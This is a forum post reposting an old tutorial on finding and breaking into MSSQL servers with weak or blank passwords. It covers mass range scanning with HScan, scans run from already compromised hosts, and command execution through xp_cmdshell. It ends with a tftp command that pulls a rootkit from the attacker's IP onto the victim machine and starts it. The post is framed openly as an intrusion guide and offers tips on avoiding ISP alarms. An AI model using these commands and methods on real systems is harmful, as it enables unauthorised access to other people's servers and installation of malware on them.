10-09-2008, 02:37 AM
|
#1 (permalink)
|
|
Administrator
Points: 53,593, Level: 34 |
Join Date: Dec 2007
Posts: 314
Thanks: 0
Thanked 62 Times in 34 Posts
My Mood:
Rep Power: 1000
|
MYSQL Hacking Tutorial
原帖地址: EliteHackerz.net MYSQL Hacking Tutorial
Code:
MSSQL Hacking
MSSQL Hacking by wtfmates - 26-05-2005
wtfm4tes [at] gmail.com
=========================
I'm going to try to keep this tutorial as simple as possible. This tutorial will tell you how to Find and Exploit MSSQL servers.
You will need:
SQLExec (Google it, theres a few versions, the NetHackerIII version or the Green Apple ones will suffice)
A Portscanner (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
HSCAN v1.20 (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
TFTPD32 (h!!p://tftpd32.jounin.net/)
Ok, I'll cover two ways to find MSSQL Servers. Well..its actually one way just preformed slightly different ways.
First Method (Range Method):
Basically just load up HScan v1.20 (hscan_gui.exe) and go Menu -> Modules and uncheck everything except 'Check hostname of target'
and 'Check MSSQL weak accounts'. Now under Menu -> Parameters just enter a Start IP and a End IP, Adjust Max Threads/Host to whatever
your comfortable with, when scanning from home i use 20 Threads and 5 Hosts. If scanning from a ScanStro (more on this later) I use
anywhere from 25 to 50 threads and anywhere from 10 to 20 hosts. I leave the Timeout and SleepTime to default and also leave 'Ping host
before scan' checked. Once you have this all set accordingly click OK and now click Menu -> Start to start whoring whatever range you
selected.
What this will do is Ping -> Check TCP 1433 -> Resolve hostname -> Attempt to crack MSSQL Accts
To do this remotely from a scanstro using normal hscan cli simply send a raw
SITE EXEC hide.exe hscan.exe -h 192.168.0.1 192.168.0.254 -report -name -mssql -max 30,10
Second Method (List Method):
This is pretty much the exact same as the range method your using a host list instead of whoring a range. I prefer this method as it tends
to attract less attention and wont set off as many alarms at your ISP. Basically in Parameters in hscan_hui just check off 'Hosts List'
and open a list ip's with mssql servers running on them. To get such a list you can usually check your fav boards or im sure there are
some scanners out there that have good enough logging options that can do it for you as well. Also using your scanstro to portscan would
suffice as well. To preform a host list based mssql scan from a scan stro simply send a raw like this:
SITE EXEC hide.exe hscan.exe -f hosts.txt -report -name -mssql -max 30,10
Exploiting:
Anywh0re, After aforementioned scans are finished you should hopefully have some cracked accounts to play with. The scan results generated
by hscan are in HTML format and look a little something like this:
-----------------------------------------
192.168.0.151 (p1336.omgwtfhax.info)
192.168.0.152 (p1337.omgwtfhax.info)
[MYSQL SCAN]
Version: 4.1.8
Cracked account: root/[null]
192.168.0.153 (p1338.omgwtfhax.info)
-----------------------------------------
From what i can tell the 'NetHackerIII' version of sqlexec.exe is easier to find then the Green Apple one so I'll use that on in my
examples. (MS-SQL Exec for NetHackerIII Version 1.0.0.0)
Open sqlexec.exe and you'll be prompted with some ghey screen? (TianXing Free Regsitration Center) Just click Later. Now this screen
should be pretty self explanitory. In this case we would put 192.168.0.152 in the Host box and "root" without quotes in Username and
Password is just left blank ([null] == nothing derr) Hit Connect and for a test command i use 'ver' instead of 'dir c:\' so my output
looks a little something like this:
-----------------------------------------
MS-SQL Exec for NetHackerIII Version 1.0.0.0
Copyright © TianXing Software Kingdom 1999-2001.
Programmed by ChenWeishan 2001.2
WEB: h!!p://www.tianxing.org , h!!p://www.softkingdom.net
Email: tianxing [at] 163.net
ICQ: 13101363 , OICQ: 911189
SQL>Connecting 192.168.0.152.
SQL>Connected to 192.168.0.152.
SQL>Command: xp_cmdshell "ver"
LzÃ�?öÃÃÃ�gC½ö ¼ô=Ã�?öÃÃÃ�Ã�õ� Ã�?Ã�8¯"
Mcft Windows 2000 [Versão 5.00.2195]
Mcft Windows 2000 [Versão 5.00.2195]
-----------------------------------------
This is where TFTPD32 comes in. Run tftpd32.exe and make sure you set the 'Server interface' to your real ip and not your LAN one should
it show up in the list. Now you can upload your favorite rootkit or scanstro to this box in the following fashion, send the command:
tftp -i 1.3.3.7 get rootkit.exe C:\winnt\system32\rootkit.exe
Where 1.3.3.7 is your ip, now send:
start C:\winnt\system32\rootkit.exe
That should execute the rootkit on the box and you can now close sqlexec and should now have access via whatever means your rootkit
provides. Happy rooting!
-wtfmates
__________________
|
|
|
Linear Mode
